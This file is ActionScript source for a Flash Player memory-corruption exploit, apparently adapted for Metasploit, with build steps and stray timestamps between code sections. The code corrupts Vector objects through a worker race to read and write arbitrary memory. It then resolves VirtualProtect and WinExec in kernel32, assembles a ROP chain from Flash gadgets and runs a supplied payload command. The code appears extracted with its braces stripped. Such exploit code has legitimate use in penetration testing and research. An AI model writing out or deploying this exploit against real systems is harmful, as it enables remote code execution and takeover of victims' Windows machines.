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2015-03-27 23:51:13 +00:00
// Build how to:
// 1. Download the AIRSDK, and use its compiler.
// 2. Be support to support 16.0 as target-player (flex-config.xml).
// 3. Download the Flex SDK (4.6)
// 4. Copy the Flex SDK libs (<FLEX_SDK>/framework/libs) to the AIRSDK folder (<AIR_SDK>/framework/libs)
// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
// 5. Build with: mxmlc -o msf.swf
// Original code by @hdarwin89 //
// Modified to be used from msf
2015-03-29 20:52:13 +00:00
import flash.display.Sprite
import flash.display.LoaderInfo
import flash.utils.ByteArray
import flash.system.Worker
import flash.system.WorkerDomain
import flash.system.MessageChannel
import flash.system.ApplicationDomain
import avm2.intrinsics.memory.casi32
import mx.utils.Base64Decoder
public class Main extends Sprite
private var ov:Vector.<Object> = new Vector.<Object>(25600)
private var uv:Vector.<uint> = new Vector.<uint>
private var ba:ByteArray = new ByteArray()
private var worker:Worker
private var mc:MessageChannel
private var b64:Base64Decoder = new Base64Decoder()
private var payload:String = ""
public function Main()
if (Worker.current.isPrimordial) mainThread()
else workerThread()
private function mainThread():void
payload = b64.toByteArray().toString()
ba.length = 0x1000
ba.shareable = true
for (var i:uint = 0; i < ov.length; i++) {
ov[i] = new Vector.<Object>(1014)
ov[i][0] = ba
ov[i][1] = this
for (i = 0; i < ov.length; i += 2) delete(ov[i])
worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
mc = worker.createMessageChannel(Worker.current)
mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
worker.setSharedProperty("mc", mc)
worker.setSharedProperty("ba", ba)
ApplicationDomain.currentDomain.domainMemory = ba
private function workerThread():void
var ba:ByteArray = Worker.current.getSharedProperty("ba")
var mc:MessageChannel = Worker.current.getSharedProperty("mc")
ov[0] = new Vector.<uint>(1022)
while (mc.messageAvailable);
ov[0][0] = ov[0][0x403] - 0x18 - 0x1000
ba.length = 0x500000
var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + 0x100000
var main:uint = ov[0][0x409] - 1
var vtable:uint = vector_read(main)
vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8)
vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff)
mc.send(ov[0][0].toString() + "/" + buffer.toString() + "/" + main.toString() + "/" + vtable.toString())
private function onMessage(e:Event):void
casi32(0, 1022, 0xFFFFFFFF)
if (ba.length != 0xffffffff) mc.receive()
else {
ba.endian = "littleEndian"
var data:Array = (mc.receive() as String).split("/")
var buffer:uint = parseInt(data[1]) as uint
var main:uint = parseInt(data[2]) as uint
var vtable:uint = parseInt(data[3]) as uint
var flash:uint = base(vtable)
var ieshims:uint = module("winmm.dll", flash)
var kernel32:uint = module("kernel32.dll", ieshims)
var virtualprotect:uint = procedure("VirtualProtect", kernel32)
var winexec:uint = procedure("WinExec", kernel32)
var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
byte_write(0, "\x89\x03", false) // mov [ebx], eax
byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
byte_write(buffer+0x200, payload);
byte_write(buffer + 0x20070, xchgeaxespret)
byte_write(buffer + 0x20000, xchgeaxesiret)
byte_write(0, virtualprotect)
// VirtualProtect
byte_write(0, winexec)
byte_write(0, buffer + 0x30000)
byte_write(0, 0x1000)
byte_write(0, 0x40)
byte_write(0, buffer + 0x100)
// WinExec
byte_write(0, buffer + 0x30000)
byte_write(0, buffer + 0x200)
byte_write(main, buffer + 0x20000)
private function vector_write(addr:uint, value:uint = 0):void
addr > ov[0][0] ? ov[0][(addr - uv[0]) / 4 - 2] = value : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1] = value
private function vector_read(addr:uint):uint
return addr > ov[0][0] ? ov[0][(addr - ov[0][0]) / 4 - 2] : ov[0][0xffffffff - (ov[0][0] - addr) / 4 - 1]
private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
if (addr) ba.position = addr
if (value is String) {
for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
if (zero) ba.writeByte(0)
} else ba.writeUnsignedInt(value)
private function byte_read(addr:uint, type:String = "dword"):uint
ba.position = addr
switch(type) {
case "dword":
return ba.readUnsignedInt()
case "word":
return ba.readUnsignedShort()
case "byte":
return ba.readUnsignedByte()
return 0
private function base(addr:uint):uint
addr &= 0xffff0000
while (true) {
if (byte_read(addr) == 0x00905a4d) return addr
addr -= 0x10000
return 0
private function module(name:String, addr:uint):uint
var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
while (true) {
var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
if (!entry) throw new Error("FAIL!");
ba.position = addr + entry
if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
private function procedure(name:String, addr:uint):uint
var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
var numberOfNames:uint = byte_read(eat + 0x18)
var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
var addressOfNames:uint = addr + byte_read(eat + 0x20)
var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
for (var i:uint = 0; ; i++) {
var entry:uint = byte_read(addressOfNames + i * 4)
ba.position = addr + entry
if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
private function gadget(gadget:String, hint:uint, addr:uint):uint
var find:uint = 0
var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
var value:uint = parseInt(gadget, 16)
for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
return addr + i
2015-03-27 23:51:13 +00:00
2015-03-29 20:52:13 +00:00